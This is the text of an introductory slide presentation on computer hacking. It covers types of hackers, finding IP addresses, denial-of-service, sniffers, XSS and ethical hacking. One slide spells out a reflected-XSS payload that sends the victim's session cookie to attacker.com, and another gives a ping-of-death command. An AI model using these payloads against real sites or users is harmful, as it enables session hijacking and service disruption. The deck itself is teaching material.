+ All Categories

Download - Hack the hack

Transcript
Page 1: Hack the hack

HACKINGComputer Security

Team Presentation By:

Shakti Ranjan

Page 2: Hack the hack

What is Hacking?

HackingJust like burglars break into houses, hackers break into

computers. Do you ever wonder how hackers get inside your computer? How can you stop them?

Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.

Page 3: Hack the hack

Types of hackers Professional hackers

Black Hats – the Bad Guys White Hats – Professional Security Experts

Script kiddies Mostly kids/students

User tools created by black hats, To get free stuff Impress their peers Not get caught

Underemployed Adult Hackers Former Script Kiddies

Can’t get employment in the field Want recognition in hacker community Big in eastern european countries

Ideological Hackers hack as a mechanism to promote some political or ideological purpose Usually coincide with political events

Page 4: Hack the hack

Hacker Terms

Hacking - showing computer expertise Cracking - breaching security on software or systems Phreaking - cracking telecom networks Spoofing - faking the originating IP address in a datagram Denial of Service (DoS) - flooding a host with sufficient

network traffic so that it can’t respond anymore Port Scanning - searching for vulnerabilities

Page 5: Hack the hack

Basic Hacking Skills

Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer

languages, you cant do hacking.

Get one of the open-source Unix's and learn to use and run it The single most important step any newbie can take towards acquiring hacker

skills is to get a copy of Linux or one of the BSD-Unix’s, install it on a personal machine, and run it.

Learn how to use the World Wide Web and write HTML. To be worthwhile, your page must have content -- it must be interesting and/or

useful to other hackers.

Page 6: Hack the hack

General Hacking Methods

A typical attacker works in the following manner:

1. Identify the target system.

1. Gathering Information on the target system.

1. Finding a possible loophole in the target system.

1. Exploiting this loophole using exploit code.

1. Removing all traces from the log files and escaping without a trace.

Page 7: Hack the hack

IP Addresses

Every system connected to a network has a unique Internet Protocol (IP) Address which acts as its identity on that network.

An IP Address is a 32-bit address which is divided into four fields of 8-bits each. For Example, 203.94.35.12

All data sent or received by a system will be addressed from or to the system.

An attacker’s first step is to find out the IP Address of the target system.

Page 8: Hack the hack

IP Addresses: Finding out an IP Address

A remote IP Address can easily be found out by any of the following methods:

Through Instant Messaging Software

Through Internet Relay Chat

Through Your website

Through Email Headers

Page 9: Hack the hack

Finding an IP Address via Instant Messengers

Case: If you are chatting on messengers like MSN, YAHOO etc. then the following indirect connection exists between your system and your friend’s system:

Your System------Chat Server---- Friend’s System

Friend’s System---------Chat Server------- Your System

Thus in this case, you first have to establish a direct connection with your friend’s computer by either sending him a file or by using the call feature.

Then, goto MSDOS or the command line and type:

C:\>netstat -n

This command will give you the IP Address of your friend’s computer.

Page 10: Hack the hack

Finding an IP Address via Email Headers

Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email.

A Typical excerpt of such a Header of an email sent from a Hotmail account is:

Return-Path: <[email protected]>Received: from hotmail.com by sbcglobal.net (8.9.1/1.1.20.3/13Oct08-0620AM)

id TAA0000032714; Sun, 12 OCT 2008 19:02:21 +0530 (CST)Message-ID: <[email protected]>Received: from 202.54.109.174 by www.hotmail.com with HTTP; Sun, Sun,

12 OCT 2008 05:30:14 PSTX-Originating-IP: [202.xx.109.174]

Page 11: Hack the hack

IP Addresses: Dangers & Concerns

Dangers & Concerns

DOS Attacks Disconnect from the Internet Trojans Exploitation Geographical Information File Sharing Exploits

Page 12: Hack the hack

Various Types of Attacks

There are an endless number of attacks, which a system administrator has to protect his system from. However, the most common ones are:

Denial of Services attacks (DOS Attacks) Threat from Sniffing and Key Logging Trojan Attacks IP Spoofing Buffer Overflows All other types of Attacks

Page 13: Hack the hack

THREAT TO INDIA

Days after the international hacker group Anonymous brought down Reliance's internet services, the Computer Emergency Response Team India (CERT-In) has warned that websites of reputed

government and private organisations are under threat

"It is observed that some hacker groups are launching Distributed Denial of Service (DDoS) attacks on websites of government and private organisations in India.In a recent written reply in the Lok Sabha, Minister of State for Communications and IT Sachin Pilot said 112 government websites,

including that of Bharat Sanchar Nigam Ltd (BSNL), were hacked in just three months

"These attacks are being launched through popular DDoS tools and can consume bandwidth requiring appropriate proactive actions in coordination with service providers,"

Page 14: Hack the hack

Denial of Services (DOS) Attacks

DOS Attacks are aimed at denying valid, legitimate Internet and Network users access to the services offered by the target system. In other words, a DOS attack is one in which you clog up so much memory on the target system that it cannot serve legitimate users.

There are numerous types of Denial of Services Attacks or DOS Attacks.

Page 15: Hack the hack

DOS Attacks: Ping of Death Attack

The maximum packet size allowed to be transmitted by TCP\IP on a network is 65 536 bytes.

In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCP\IP, is sent to the target system.

As soon as the target system receives a packet exceeding the allowable size, then it crashes, reboots or hangs.

This attack can easily be executed by the ‘ping’ command as follows:

ping -l 65540 hostname

Page 16: Hack the hack

Threats from Sniffers and Key Loggers

Sniffers: capture all data packets being sent across the network in the raw form.

Commonly Used for:

Traffic Monitoring Network Trouble shooting Gathering Information on Attacker. For stealing company Secrets and sensitive data.

Commonly Available Sniffers

tcpdump Ethereal Dsniff

Page 17: Hack the hack

NETWORK HACKING

Page 18: Hack the hack

Overview of Internet Security

Page 19: Hack the hack

UIC Education Center 19

A Typical Hack

Internet

PublicDNS Server

2 22

2

Web Server (Internal Users)

DB Servers

DB Server

App Servers

TRUSTED eC SEGMENT

SAN

S/W Load Balancing

SAN

Firewall

DMZ

Web Servers

FTP Drop

H/W or S/WLoad

Balancing

2

4Firewall Firewall

Corporate LAN

Employees & Other Internal Users

Trusted Business Partners

Extranet Firewall

Level IV Data

Page 20: Hack the hack

Attacking other users: XSS

Reflected XSS User-input is reflected to web page

Common vulnerability is reflection of input for an error message Exploitation:

User logs in

Attacker feeds crafted URL

User requests attacker’s URL

Server responds with attacker’s Javascript

User’s browser sends session token to attacker

Attacker hijacks user’s session

Page 21: Hack the hack

Attacking other users: XSS

Reflected XSS Exploit:

1. User logs on as normal and obtains a session cookie2. Attacker feeds a URL to the user

https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bddocument.cookie;</script>

3. The user requests from the application the URL fed to them by the attacker4. The server responds to the user’s request; the answer contains the javascript5. User browser receives and executes the javascript

var I = new Image; i.src=http://attacker.com/+document.cookie6. Code causes the user’s browser to make a request to attacker.com which

contains the current session token7. Attacker monitors requests to attacker.com and captures the token in order

to be able to perform arbitrary actions as the user

Page 22: Hack the hack

Attacking other users: XSS

Stored XSS Vulnerability

Attacker submits question containing malicious Javascript

User logs in and views attackers question

Server responds with attacker’s JavascriptAttacker’s Javascript

executes in user’s browser

User’s browser sends session token to attacker

Attacker hijacks user’s session

Page 23: Hack the hack

VulnerabilityWhat is a vulnerability?

Today’s computer software is very complex, comprised of thousands of lines of code. Since software is written by humans, it’s hardly surprising that they contain programming mistakes, known as vulnerabilities. These loopholes are used by hackers to break into systems; they are also used by authors of malicious code to launch their programs automatically on your computer.

Page 24: Hack the hack

Ethical Hacking Independent computer security

Professionals breaking into the computer systems.

Neither damage the target systems nor steal information.

Evaluate target systems security and report back to owners about the vulnerabilities found.

Page 25: Hack the hack

Ethical Hackers but not Criminal Hackers

Completely trustworthy. Strong programming and computer

networking skills. Learn about the system and trying to find

its weaknesses. Techniques of Criminal hackers-Detection-

Prevention. Published research papers or released

security software. No Ex-hackers.

Page 26: Hack the hack

Being Prepared What can an intruder see on the target systems? What can an intruder do with that information? Does anyone at the target notice the intruder's attempts or

successes?

1. What are you trying to protect? 2. Who are you trying to protect against? 3. How much time, effort, and money are you willing to

expend to obtain adequate protection?

Page 27: Hack the hack

Hands-On Ethical Hacking and Network Defense 27

Ethical hackers Employed by companies to perform penetration tests

Penetration test Legal attempt to break into a company’s network to find its

weakest link Tester only reports findings, does not solve problems

Security test More than an attempt to break in; also includes analyzing

company’s security policy and procedures Tester offers solutions to secure or protect the network

Page 28: Hack the hack

Hands-On Ethical Hacking and Network Defense 28

Hackers Access computer system or network without authorization Breaks the law; can go to prison

Crackers Break into systems to steal or destroy data U.S. Department of Justice calls both hackers

Ethical hacker Performs most of the same activities but with owner’s permission

Page 29: Hack the hack

Computer Crimes Financial Fraud Credit Card Theft Identity Theft Computer specific crimes

Denial-of-service Denial of access to information Viruses Melissa virus cost New Jersey man 20 months in jail

Melissa caused in excess of $80 Million Intellectual Property Offenses

Information theft Trafficking in pirated information Storing pirated information Compromising information Destroying information

Content related Offenses Hate crimes Harrassment Cyber-stalking

Child privacy

Page 30: Hack the hack

UIC Education Center 30

Question and Answer

Q&A

??

Page 31: Hack the hack

UIC Education Center 31

Suggestions!!..


Top Related